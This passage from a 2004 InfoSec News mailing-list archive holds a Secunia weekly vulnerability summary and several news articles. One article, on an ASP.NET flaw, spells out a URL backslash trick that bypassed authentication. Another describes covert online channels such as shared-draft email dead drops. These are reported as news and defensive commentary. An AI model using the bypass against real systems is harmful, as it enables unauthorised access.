Where: From local network Impact: Exposure of system information Released: 2004-12-10 Oliver Karow has reported a weakness in F-Secure Policy Manager, which can be exploited by malicious people to disclose certain system information. Full Advisory: http://secunia.com/advisories/13416/ -- [SA13409] Microsoft Office SharePoint Portal Server Disclosure of User Credentials Critical: Not critical Where: Local system Impact: Exposure of sensitive information Released: 2004-12-10 Alexander Fichman has reported a weakness in Microsoft Office SharePoint Portal Server 2003, which may disclose sensitive information to malicious, local users on the system. Full Advisory: http://secunia.com/advisories/13409/ UNIX/Linux:-- [SA13474] Adobe Acrobat Reader "mailListIsPdf()" Function Buffer Overflow Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-15 iDEFENSE has reported a vulnerability in Adobe Acrobat Reader, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13474/ -- [SA13461] Debian update for zgv Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-15 Debian has issued an update for zgv. This fixes multiple vulnerabilities, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13461/ -- [SA13435] Red Hat update for imlib Critical: Highly critical Where: From remote Impact: System access, DoS Released: 2004-12-13 Red Hat has issued an update for imlib. This fixes multiple vulnerabilities, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13435/ -- [SA13425] Citadel/UX "lprintf()" Function Format String Vulnerability Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-13 CoKi has reported a vulnerability in Citadel/UX, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13425/ -- [SA13417] Debian update for xfree86 Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2004-12-13 Debian has issued an update for xfree86. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13417/ -- [SA13456] Red Hat update for ncompress Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-14 Red Hat has issued an update for ncompress. This fixes an old vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13456/ -- [SA13449] zgv/xzgv Multiple Integer Overflow Vulnerabilities Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-14 Some vulnerabilities have been reported in zgv/xzgv, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13449/ -- [SA13439] Gentoo update for file Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-14 Gentoo has issued an update for file. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13439/ -- [SA13436] Sun Solaris Sendmail DNS TXT Records Buffer Overflow Critical: Moderately critical Where: From remote Impact: DoS, System access Released: 2004-12-14 An old vulnerability has been reported in sendmail included in Solaris 9, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13436/ -- [SA13428] Gentoo update for phprojekt Critical: Moderately critical Where: From remote Impact: Security Bypass Released: 2004-12-13 Gentoo has issued an update for phprojekt. This fixes a vulnerability, which can be exploited by malicious people to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/13428/ -- [SA13418] OmniWeb Window Injection Vulnerability Critical: Moderately critical Where: From remote Impact: Spoofing Released: 2004-12-10 Secunia Research has reported a vulnerability in OmniWeb, which can be exploited by malicious people to spoof the content of websites. Full Advisory: http://secunia.com/advisories/13418/ -- [SA13412] iCab Window Injection Vulnerability Critical: Moderately critical Where: From remote Impact: Spoofing Released: 2004-12-10 Secunia Research has reported a vulnerability in iCab, which can be exploited by malicious people to spoof the content of websites. Full Advisory: http://secunia.com/advisories/13412/ -- [SA13459] Gentoo update for nfs-utils Critical: Moderately critical Where: From local network Impact: DoS, System access Released: 2004-12-14 Gentoo has issued an update for nfs-utils. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13459/ -- [SA13458] Red Hat update for itanium kernel Critical: Moderately critical Where: From local network Impact: Exposure of system information, Exposure of sensitive information, Privilege escalation, DoS, System access Released: 2004-12-14 Red Hat has issued an update for the itanium kernel. This fixes multiple vulnerabilities, which can be exploited to gain escalated privileges, cause a DoS (Denial of Service), gain knowledge of sensitive information, or potentially compromise a system. Full Advisory: http://secunia.com/advisories/13458/ -- [SA13457] Red Hat update for kernel Critical: Moderately critical Where: From local network Impact: Exposure of sensitive information, Privilege escalation, DoS, System access Released: 2004-12-14 Red Hat has issued an update for the kernel. This fixes multiple vulnerabilities, which can be exploited to gain escalated privileges, gain knowledge of sensitive information, cause a DoS (Denial of Service), or potentially compromise a system. Full Advisory: http://secunia.com/advisories/13457/ -- [SA13440] nfs-utils "getquotainfo()" Buffer Overflow Vulnerability Critical: Moderately critical Where: From local network Impact: System access Released: 2004-12-14 Arjan van de Ven has reported a vulnerability in nfs-utils, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13440/ -- [SA13429] SGI IRIX update for samba Critical: Moderately critical Where: From local network Impact: DoS, System access Released: 2004-12-13 SGI has issued an update for samba. This fixes multiple vulnerabilities, which can be exploited to cause a DoS (Denial of Service) or compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13429/ -- [SA13455] Red Hat update for apache/mod_ssl Critical: Less critical Where: From remote Impact: Security Bypass, Spoofing, Privilege escalation Released: 2004-12-14 Red Hat has issued updates for apache and mod_ssl. These fix multiple vulnerabilities, which can be exploited to gain escalated privileges, gain unauthorised access to other web sites, or bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/13455/ -- [SA13454] Red Hat update for ruby Critical: Less critical Where: From remote Impact: DoS Released: 2004-12-14 Red Hat has issued an update for ruby. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/13454/ -- [SA13447] Opera Default Application "kfmclient exec" Security Issue Critical: Less critical Where: From remote Impact: System access Released: 2004-12-15 Giovanni Delvecchio has discovered a security issue in Opera, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13447/ -- [SA13437] Sun Java System Web Server / Application Server Session ID Disclosure Critical: Less critical Where: From remote Impact: Exposure of sensitive information Released: 2004-12-14 A vulnerability has been reported in Sun Java System Web Server and Application Server, which can be exploited by malicious people to gain knowledge of sensitive information. Full Advisory: http://secunia.com/advisories/13437/ -- [SA13432] mnoGoSearch Cross-Site Scripting Vulnerabilities Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2004-12-13 Michael Krax and Mark J. Cox has reported some vulnerabilities in mnoGoSearch, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/13432/ -- [SA13469] Linux Kernel IGMP and "__scm_send()" Vulnerabilities Critical: Less critical Where: From local network Impact: Exposure of sensitive information, Privilege escalation, DoS Released: 2004-12-15 Paul Starzetz has reported some vulnerabilities in the Linux Kernel, which can be exploited by malicious people to cause a DoS (Denial of Service), and by malicious, local users to cause a DoS, gain knowledge of sensitive information, or potentially gain escalated privileges. Full Advisory: http://secunia.com/advisories/13469/ -- [SA13473] Debian update for atari800 Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-15 Debian has issued an update for atari800. This fixes multiple vulnerabilities, which can be exploited by malicious, local users to escalate their privileges on a vulnerable system. Full Advisory: http://secunia.com/advisories/13473/ -- [SA13442] Mandrake update for postgresql Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-14 MandrakeSoft has issued an update for postgresql. This fixes a vulnerability, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges. Full Advisory: http://secunia.com/advisories/13442/ -- [SA13430] mtr "mtr_curses_keyaction()" Function Buffer Overflow Vulnerability Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-14 Przemysaw Frasunek has reported a vulnerability in mtr, which potentially can be exploited by malicious, local users to perform certain actions with escalated privileges. Full Advisory: http://secunia.com/advisories/13430/ -- [SA13410] Linux Kernel "sys32_ni_syscall" and "sys32_vm86_warning" Buffer Overflows Critical: Less critical Where: Local system Impact: Unknown Released: 2004-12-09 Jeremy Fitzhardinge has reported some potential vulnerabilities with an unknown impact in the Linux Kernel. Full Advisory: http://secunia.com/advisories/13410/ -- [SA13480] Gentoo update for ncpfs Critical: Not critical Where: Local system Impact: DoS Released: 2004-12-15 Gentoo has issued an update for ncpfs. This fixes a potential vulnerability, which can be exploited by malicious, local users. Full Advisory: http://secunia.com/advisories/13480/ -- [SA13444] Mandrake update for iproute2 Critical: Not critical Where: Local system Impact: DoS Released: 2004-12-14 MandrakeSoft has issued an update for iproute2. This fixes a vulnerability, which can be exploited by malicious, local users to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/13444/ -- [SA13443] OpenBSD isakmpd Denial of Service Vulnerability Critical: Not critical Where: Local system Impact: DoS Released: 2004-12-15 A vulnerability has been reported in OpenBSD, which can be exploited by malicious, local users to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/13443/ Other:-- [SA13434] Novell Netware "nlm" Screensaver Password Bypass Vulnerability Critical: Less critical Where: Local system Impact: Security Bypass Released: 2004-12-14 Novacoast has reported a vulnerability in Novell Netware, which can be exploited by a malicious person with physical access to a system to bypass the password protected screensaver. Full Advisory: http://secunia.com/advisories/13434/ Cross Platform:-- [SA13479] GNUBoard "doc" Parameter Arbitrary File Inclusion Vulnerability Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-15 Jeremy Bae has reported a vulnerability in GNUBoard, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13479/ -- [SA13478] MoniWiki Multiple File Extensions Script Upload Vulnerability Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-15 Jeremy Bae has reported a vulnerability in MoniWiki, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13478/ -- [SA13471] Adobe Reader / Adobe Acrobat Multiple Vulnerabilities Critical: Highly critical Where: From remote Impact: Exposure of sensitive information, System access Released: 2004-12-15 Some vulnerabilities have been reported in Adobe Reader and Adobe Acrobat, which can be exploited by malicious people to disclose sensitive information or compromise a user's system. Full Advisory: http://secunia.com/advisories/13471/ -- [SA13468] Ethereal Multiple Vulnerabilities Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2004-12-15 Multiple vulnerabilities have been reported in Ethereal, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13468/ -- [SA13448] NetMail IMAPD Unspecified Buffer Overflow Vulnerability Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-15 A vulnerability has been reported in NetMail, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13448/ -- [SA13424] phpMyAdmin Two Vulnerabilities Critical: Highly critical Where: From remote Impact: Exposure of sensitive information, System access Released: 2004-12-14 Nicolas Gregoire has reported two vulnerabilities in phpMyAdmin, which can be exploited by malicious people to compromise a vulnerable system and by malicious users to disclose sensitive information. Full Advisory: http://secunia.com/advisories/13424/ -- [SA13421] phpBB Attachment Mod Two Vulnerabilities Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-13 Two vulnerabilities have been reported in the Attachment Mod module for phpBB, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13421/ -- [SA13419] MediaWiki "images" Arbitrary Script Upload and Execution Vulnerability Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-13 A vulnerability has been reported in MediaWiki, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13419/ -- [SA13467] phpGroupWare Cross-Site Scripting and SQL Injection Vulnerabilities Critical: Moderately critical Where: From remote Impact: Cross Site Scripting, Manipulation of data, Exposure of system information Released: 2004-12-15 James Bercegay has reported some vulnerabilities in phpGroupWare, which can be exploited by malicious people to conduct cross-site scripting and SQL injection attacks. Full Advisory: http://secunia.com/advisories/13467/ -- [SA13451] Sugar Sales Arbitrary Local File Inclusion Vulnerabilities Critical: Moderately critical Where: From remote Impact: Exposure of system information, Exposure of sensitive information Released: 2004-12-14 Daniel Fabian has reported some vulnerabilities in Sugar Sales, which can be exploited by malicious people to disclose sensitive information. Full Advisory: http://secunia.com/advisories/13451/ -- [SA13446] Lithtech Engine UDP Datagram Denial of Service Vulnerability Critical: Moderately critical Where: From remote Impact: DoS Released: 2004-12-14 Luigi Auriemma has reported a vulnerability in Lithtech Engine, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/13446/ -- [SA13431] SQLgrey Postfix greylisting service Unspecified SQL Injection Critical: Moderately critical Where: From remote Impact: Manipulation of data Released: 2004-12-13 A vulnerability has been reported in SQLgrey Postfix greylisting service, which can be exploited by malicious people to conduct SQL injection attacks. Full Advisory: http://secunia.com/advisories/13431/ -- [SA13422] PhpDig Unspecified Vulnerability Critical: Moderately critical Where: From remote Impact: Unknown Released: 2004-12-13 A vulnerability with an unknown impact has been reported in PhpDig. Full Advisory: http://secunia.com/advisories/13422/ -- [SA13420] PHP Live! Unspecified Vulnerability Critical: Moderately critical Where: From remote Impact: Unknown Released: 2004-12-13 A vulnerability with an unknown impact has been reported in PHP Live!. Full Advisory: http://secunia.com/advisories/13420/ -- [SA13413] IlohaMail Unspecified Vulnerability Critical: Moderately critical Where: From remote Impact: Unknown Released: 2004-12-10 A vulnerability with an unknown impact has been reported in IlohaMail. Full Advisory: http://secunia.com/advisories/13413/ -- [SA13452] UBB.threads "Cat" Cross-Site Scripting Vulnerabilities Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2004-12-14 gp has reported some vulnerabilities in UBB.threads, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/13452/ -- [SA13441] UseModWiki "wiki.pl" Cross-Site Scripting Vulnerability Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2004-12-14 Jeremy Bae has reported a vulnerability in UseModWiki, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/13441/ -- [SA13414] PHP Gift Registry "message" Cross-Site Scripting Vulnerabilities Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2004-12-10 Some vulnerabilities have been reported in PHP Gift Registry, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/13414/ ======================================================================== Secunia recommends that you verify all advisories you receive, by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Subscribe: http://secunia.com/secunia_weekly_summary/ Contact details: Web : http://secunia.com/ E-mail : support@secunia.com Tel : +45 70 20 51 44 Fax : +45 70 20 51 45 ======================================================================== From isn at c4i.org Wed Dec 22 02:34:48 2004 From: isn at c4i.org (InfoSec News) Date: Wed Dec 22 03:40:44 2004 Subject: [ISN] Security holes that run deep Message-ID: http://www.theregister.co.uk/2004/12/21/simple_aspnet_security_hole/ By Mark Burnett SecurityFocus 21st December 2004 A couple of months ago, Toby Beaumont reported an ASP.NET vulnerability that, depending on the server configuration, allowed anyone to completely bypass user authentication and access protected files. Microsoft quickly provided a fix and the issue passed without much fanfare, mostly because the flaw wasn't widely exploited, and consequently many people failed to recognize just how serious this attack vector could be. For nearly a decade, as the freedom of the Internet gave way to anarchy, IIS was the target of countless file access and canonicalization exploits. But Microsoft responded with an aggressive overhaul that resulted in IIS 6, a Web server that is surprisingly secure, even with a default installation. In fact, they did such a great job that IIS security has since become a boring topic. Although ASP.NET has had some problems, it too has held up fairly well. But this last flaw revealed that ASP.NET has the potential for serious vulnerabilities. It's not the vulnerability itself that concerned me, but what this vulnerability told us about the foundations of ASP.NET file access. In a way, it reminds me of the USA PATRIOT Act, passed in response to the terrorist attacks of September 11th, 2001. Despite concerns over privacy and the potential for abuse, the new law has not personally affected anyone I know. Nevertheless, it still troubles me, because it messes with fundamentals without anyone completely understanding the future impact of these changes. We really cannot anticipate what problems we might encounter, especially when this law is combined with other future laws. If you never mess with basic civil liberties in the first place, you never have to worry about these complexities in the future. That is why this ASP.NET issue concerns me. This isn't politics, but I see basic rules broken that might lead to complex future issues. Poor Posture The specific flaw Beaumont found was deceptively simple: by using a backslash instead of a forward slash you could access secure ASP.NET resources that normally required authentication. So, if accessing www.example.net/secure/private.aspx is supposed to require authentication, anyone who wants to could still access the file by entering the URL as www.example.net/secure\private.aspx (or using %5C instead of the backslash in IE). Even if you set NTFS permissions to block anonymous users from accessing the file, ASP.NET still allowed access. As simple as it was to exploit, the existence of the bug told us a lot about ASP.NET's basic security posture -- none of it good: * ASP.NET was not always using NTFS permissions to enforce file access. * You can fool ASP.NET by disguising the file path. * ASP.NET did not properly filter URL requests. * ASP.NET authentication fails open rather than failing closed. It turns out that the problem was not with ASP.NET's authentication code, it was an authorization issue. Authentication validates a user's identity, but authorization is what determines if authentication needs to take place. On a typical website, some resources are available to everyone while other resources are only available to authenticated users. The ASP.NET authorization code determines if the resource requires authentication or not by checking the configuration file of the current application, and looking for rules that match the requested URL. If the URL does not match any of those rules, it checks the configuration of the parent application for a match. If it still finds no match, it continues up to each parent application until it reaches the machine configuration. By default, the machine configuration allows anyone to access anything without authentication. This means that if you can disguise a URL so that it doesn't match any rule, you will eventually end up at the default rule that says there is no need to authenticate you to access this file. In other words, if ASP.NET thinks everyone is authorized to access the file, it won't bother running its authentication code to see if a particular user is authorized to have access. ASP.NET opens the file with the security context of the ASP.NET machine account (ASPNET), unless you specifically configure the application to use impersonation. Therefore it completely bypasses any NTFS permissions you might have set on the file. While there were certain limitations that prevented widespread exploitation of this particular vulnerability, the fact that it was even possible should have been an alarming announcement. The fact that they did not follow such basic best practices brings into question what other vulnerabilities might exist. Sure, there might never be another serious ASP.NET vulnerability; and if there are any, they might never be publicly known. But that really doesn't matter, because that's not the point. The point is that you must code defensively and follow best practices from the beginning even if there are no foreseeable weaknesses with your code. I give the IIS and ASP.NET team much credit for what they have accomplished so far, but we are all facing a new standard. I'd like to see them compile a list of specific best practices that they will never, ever break. Stuff like saying they will always filter URLs, or they will always fail closed. And then I'd like to see them publish this list to demonstrate their willingness to stick to these rules. This obviously isn't just a Microsoft problem, we could all certainly learn from this lesson. But that doesn't mean Microsoft can't take the lead in tackling this problem. Whether you are talking about politics or programming, the concept is the same: follow best practices. -=- Mark Burnett is an independent security consultant and author who specializes in securing Windows-based servers. He is co-author of the best-selling book Stealing the Network (Syngress), and has also co-authored or contributed to several other books, including Special OPS: Host and Network Security for Microsoft, UNIX, and Oracle (Syngress); Maximum Windows Security (SAMS); and Dr. Tom Shinder's ISA Server and Beyond (Syngress). From isn at c4i.org Wed Dec 22 02:35:08 2004 From: isn at c4i.org (InfoSec News) Date: Wed Dec 22 03:40:47 2004 Subject: [ISN] Blood bank fears laptop heist ID theft Message-ID: http://news.com.com/Blood+bank+fears+laptop+heist+ID+theft/2100-1029_3-5500114.html By Paul Festa Staff Writer, CNET News.com December 21, 2004 More than 100,000 people who donated to a California blood bank may have parted with more than plasma. Delta Blood Bank sent a letter Friday to donors, warning them a computer that held their personal information had been stolen and advising them to take steps against identity theft and credit card fraud. "On Dec. 10, 2004, a thief or thieves stole one of two computers available for donor registration at a mobile blood drive being conducted that day," Delta CEO Benjamin Spindler wrote in the letter. "This computer contained confidential information about you, including your name, address, date of birth and your Social Security number. We deeply regret that this has happened." Identity theft has emerged one of the thorniest problems of the Internet age, and the threat has turned some missing laptops into potentially catastrophic security breaches. Wells Fargo in October had to warn customers when for the third time in a year computers with sensitive information went missing. Since July of last year, California has required organizations to notify residents of the state "in the most expedient time possible and without unreasonable delay" if security breaches have exposed residents' personal information. The law applies to breaches of someone's name, plus a Social Security number, driver's license or California ID card number, a financial account number, or a credit or debit card number with a PIN or access code. Delta's lost laptop, a new Compaq, was stolen outside the St. Paul's Lutheran Church in Tracy, Calif., following a mobile blood bank collection there. Delta's director of human resources, John O'Neill, said two layers of security could still protect the personal information despite the computer's theft. The first is Microsoft's standard Windows password required to launch the operating system, and the second is the series of steps required to launch what O'Neill described as an "esoteric, unique" database, created by a software provider he declined to name. "Could a hacker get in there, or someone familiar with those applications?" O'Neill asked rhetorically. "Potentially they could. That's why we sent the letter." In addition to the letter, which urged donors to register fraud alerts with credit reporting agencies and check their credit ratings quarterly, Delta pledged new security procedures. The blood bank will no longer require Social Security numbers from its donors, and has revised procedures for handling computer hardware and other sensitive equipment. From isn at c4i.org Wed Dec 22 02:37:12 2004 From: isn at c4i.org (InfoSec News) Date: Wed Dec 22 03:40:48 2004 Subject: [ISN] Record $39M Robbed From N. Ireland Bank Message-ID: http://www.guardian.co.uk/worldlatest/story/0,1280,-4686550,00.html [This caught me as interesting for all the levels of security that had to be breached for this robbery to have taken place. - WK] December 21, 2004 BELFAST, Northern Ireland (AP) - In one of the world's biggest robberies, thieves took the families of two top bankers hostage and forced the bosses to help them steal more than $39 million from the vaults of a Belfast bank's main office, authorities said Tuesday. Experts said Monday's raid on the Northern Bank cash center was the biggest robbery since 1987, when thieves made off with about $65 million in cash and other valuables from the Knightsbridge Safe Deposit Center in west London. The tactics in Belfast - particularly the use of hostage-taking as a way to infiltrate a high-security target - suggested a level of sophistication and experience most commonly found within Northern Ireland's rival outlawed groups, particularly the Irish Republican Army. ``This isn't a gang of Belfast criminals who just got together. It's more than that. This looks like a military operation with obvious connotations,'' said John O'Connor, a former commander of Scotland Yard's elite detective unit in London. Assistant Chief Constable Sam Kinkaid, the police officer leading the investigation, said his detectives didn't yet know whether a particular group was responsible for what he called a ``clearly well organized'' raid. In the neighboring Irish Republic, Justice Minister Michael McDowell said peacemaking efforts could be hurt if police linked the raid to the IRA, which is known to have robbed banks in the past to finance operations. The IRA has observed a truce since 1997 but remains active, running criminal rackets such as smuggling fuel and cigarettes. Diplomatic efforts to revive a power-sharing government in Northern Ireland involving Sinn Fein, the IRA-linked party backed by most Roman Catholics, have repeatedly stumbled over other groups' demands that the IRA disarm and disband. Police didn't learn about the heist until three hours after the robbers had left in a truck filled with cash from underground vaults at the bank's downtown headquarters. Kinkaid said masked gunmen invaded the homes of two senior employees of Northern Bank late Sunday and warned that if the executives didn't cooperate or tried to raise an alarm, their families would be killed. The families were held at gunpoint at undisclosed locations outdoors where overnight temperatures were near freezing. About 6 p.m. Monday, Kinkaid said, the robbers began clearing out vaults packed with cash ready to be distributed to the bank's 95 branches and hundreds of automated teller machines across Northern Ireland. Both families ``suffered great trauma'' during their abduction but were released unharmed, except for one person who needed treatment for hypothermia, he said. Kinkaid said the bank hadn't been able to provide an exact figure for the amount of stolen, partly because police shut down its offices for forensic examination, but he said it might exceed 20 million pounds, or about $39 million. Other security officials said the vaults held closer to $58 million because of the heavy cash needs of the Christmas holidays. The Guinness Book of World Records lists the theft of gold bullion from the central bank of Nazi Germany in 1944 and 1945 as the biggest of all time, valued in 1984 at $4 billion. The largest ``normal'' bank robbery is listed as the 1976 theft of $50 million in cash and deposit-box valuables from a Lebanese bank. O'Connor said the gang researched Northern Bank's security systems expertly. He said the two bank officials probably were targeted because there were ``two lots of combinations on the vault, so no one person has the knowledge.'' He said the gang must have had more than a dozen members, with at least four guarding each hostage family. Such a gang ``must be confident with each other that they're all staunch and they won't roll over in the event of being nicked (arrested),'' he said. The IRA previously gained access to high-security targets by taking the families of employees hostage, most infamously in October 1990, when it forced civilian employees of the police to drive car bombs to three British military installations. Six soldiers and a chef died in the remote-control blasts. Police say the IRA still uses hostage-taking in its criminal operations. They cite an incident in May when the IRA was accused of taking staff hostage at a retail superstore, then stealing more than $7.75 million in alcohol, appliances and other goods. From isn at c4i.org Wed Dec 22 02:37:34 2004 From: isn at c4i.org (InfoSec News) Date: Wed Dec 22 03:40:51 2004 Subject: [ISN] On the Open Internet, a Web of Dark Alleys Message-ID: http://www.nytimes.com/2004/12/20/technology/20covert.html By TOM ZELLER Jr. December 20, 2004 The indictment early this month of Mark Robert Walker by a federal grand jury in Texas might have seemed a coup for the government in its efforts to police terrorist communications online. Mr. Walker, a 19-year-old student, is accused, among other things, of using his roommate's computer to communicate with - and offer aid to - a federally designated terrorist group in Somalia and with helping to run a jihadist Web site. "I hate the U.S. government," is among the statements Mr. Walker is said to have posted online. "I wish I could have been flying one of the planes on Sept. 11." By international terror standards, it was an extremely low-level bust. But the case, which was supposedly broken only after Mr. Walker's roommate tipped off the police, highlights the near impossibility of tracking terrorist communications online. Even George J. Tenet, the former director of central intelligence, speaking on the vulnerabilities of the nation's computer networks at a technology security conference on Dec. 1, noted the ability of terrorists to "work anonymously and remotely to inflict enormous damage at little cost or risk to themselves." He called for a wholesale taming of cyberspace. "I know that these actions would be controversial in this age where we still think the Internet is a free and open society with no control or accountability," Mr. Tenet said, "But, ultimately, the Wild West must give way to governance and control." Even if the government is able to shore up its networks against attack - one of many goals set forth by the intelligence reform bill passed last week - the ability of terrorists and other dark elements to engage in covert communications online remains a daunting security problem, and one that may prove impossible to solve. Late last month, an Internet privacy watchdog group revealed that the Central Intelligence Agency had contributed money for a counterterrorism project that promised, among other things, an automated surveillance system to monitor conversations on Internet chat rooms. Developed by two computer scientists at Rensselaer Polytechnic Institute in Troy, N.Y., as part of a National Science Foundation program called Approaches to Combat Terrorism, the chat room project takes aim at the possibility that terrorists could communicate through crowded public chat channels, where the flurry of disconnected, scrolling messages makes it difficult to know who is talking to whom. The automated software would monitor both the content and timing of messages to help isolate and identify conversations. Putting privacy concerns aside, some Internet specialists wonder whether such projects, even if successful, fail to acknowledge the myriad other ways terrorists can plot and communicate online. From free e-mail accounts and unsecured wireless networks to online programs that can shield Internet addresses and hide data, the opportunities to communicate covertly are utterly available and seemingly endless. Even after the Sept. 11 attacks, "the mass media, policy makers, and even security agencies have tended to focus on the exaggerated threat of cyberterrorism and paid insufficient attention to the more routine uses made of the Internet," Gabriel Weimann, a professor of communication at Haifa University in Israel, wrote in a report for the United States Institute of Peace this year. "Those uses are numerous and, from the terrorists' perspective, invaluable." Todd M. Hinnen, a trial attorney with the United States Justice Department's computer crime division, wrote an article on terrorists' use of the Internet for Columbia Science and Technology Law Review earlier this year. "There's no panacea," Mr. Hinnen said in an interview. "There has always been the possibility of meeting in dark alleys, and that was hard for law enforcement to detect." Now, every computer terminal with an Internet connection has the potential to become a dark alley. Shortly after Sept. 11, questions swirled around steganography, the age-old technique of hiding one piece of information within another. A digital image of a sailboat, for instance, might also invisibly hold a communiqu?, a map or some other hidden data. A digital song file might contain blueprints for a desired target. But the troubling truth is that terrorists rarely have to be technically savvy to cloak their conversations. Even simple, prearranged code words can do the job when the authorities do not know whose e-mail to monitor or which Web sites to watch. Interviews conducted by Al Jazeera, the Arab television network, with the terror suspects Khalid Shaikh Mohammed and Ramzi bin al-Shibh two years ago (both have since been arrested), suggested that the Sept. 11 attackers communicated openly using prearranged code words. The "faculty of urban planning," for instance, referred to the World Trade Center. The Pentagon was the "faculty of fine arts." Other reports have suggested that Mohammed Atta, suspected of being the leader of the Sept. 11 hijackers, transmitted a final cryptic message to his co-conspirators over the Internet: "The semester begins in three more weeks. We've obtained 19 confirmations for studies in the faculty of law, the faculty of urban planning, the faculty of fine arts, and the faculty of engineering." And increasingly, new tools used to hide messages can quickly be found with a simple Web search. Dozens of free or inexpensive steganography programs are available for download. And there is ample evidence that terrorists have made use of encryption technologies, which are difficult to break. The arrest in Pakistan in July of Muhammad Naeem Noor Khan, thought to be an Al Qaeda communications specialist, for instance, yielded a trove of ciphered messages from his computers. Still, the mere act of encrypting a message could draw attention, so numerous software programs have been developed to hide messages in other ways. At one Web site, spammimic.com, a user can type in a phrase like "Meet me at Joe's" and have that message automatically converted into a lengthy bit of prose that reads like a spam message: "Dear Decision maker; Your e-mail address has been submitted to us indicating your interest in our briefing! This is a one-time mailing there is no need to request removal if you won't want any more," and so forth. The prose is then pasted into an e-mail message and sent. A recipient expecting the fake spam message can then paste it into the site's decoder and read the original message. Another free program will convert short messages into fake dialogue for a play. And still simpler schemes require no special software at all - or even the need to send anything. In one plan envisioned by Mr. Hinnen in his law review article, a group need only provide the same user name and password to all of its members, granting them all access to a single Web-based e-mail account. One member simply logs on and writes, but does not send, an e-mail message. Later, a co-conspirator, perhaps on the other side of the globe, logs on, reads the unsent message and then deletes it. "Because the draft was never sent," Mr. Hinnen wrote, the Internet service provider "does not retain a copy of it and there is no record of it traversing the Internet - it never went anywhere." The message would be essentially untraceable. Michael Caloyannides, a computer forensics specialist and a senior fellow at Mitretek Systems, a nonprofit scientific research organization based in Falls Church, Va., said the nature of a networked universe made it possible for just about anyone to communicate secretly. Conspirators do not even need to rely on code-hiding programs, because even automated teller machines can be used to send signals, Dr. Caloyannides explained, A simple withdrawal of $20 from an account in New York might serve as an instant message to an accomplice monitoring the account electronically from halfway around the world, for example. Dr. Caloyannides, who will conduct a workshop next May for government officials and others trying to track terrorist communications, also pointed to hundreds of digitally encrypted messages daily on public Usenet newsgroups. The messages often come from faked e-mail accounts; the intended recipients are often unknown. But a covert correspondent expecting a secret communiqu? at a particular newsgroup need only download a batch of messages and then use an encryption key on one with some prearranged subject line, "like 'chocolate cake,' " Dr. Caloyannides said. Lt. Col. Timothy L. Thomas, an analyst at the United States Army's Foreign Military Studies Office at Fort Leavenworth, Kan., wrote last year in the journal Parameters, the U.S. Army War College quarterly, that the threat of cyberplanning may be graver than the threat of terrorist attacks on the world's networks. "We used to talk about the intent of a tank," Colonel Thomas explained in an interview. "If you saw one, you knew what it was for. But the intent of electrons - to deliver a message, deliver a virus, or pass covert information - is much harder to figure." This has long frustrated intelligence analysts, according to James Bamford, an author and a specialist on the National Security Agency. "In the cold war 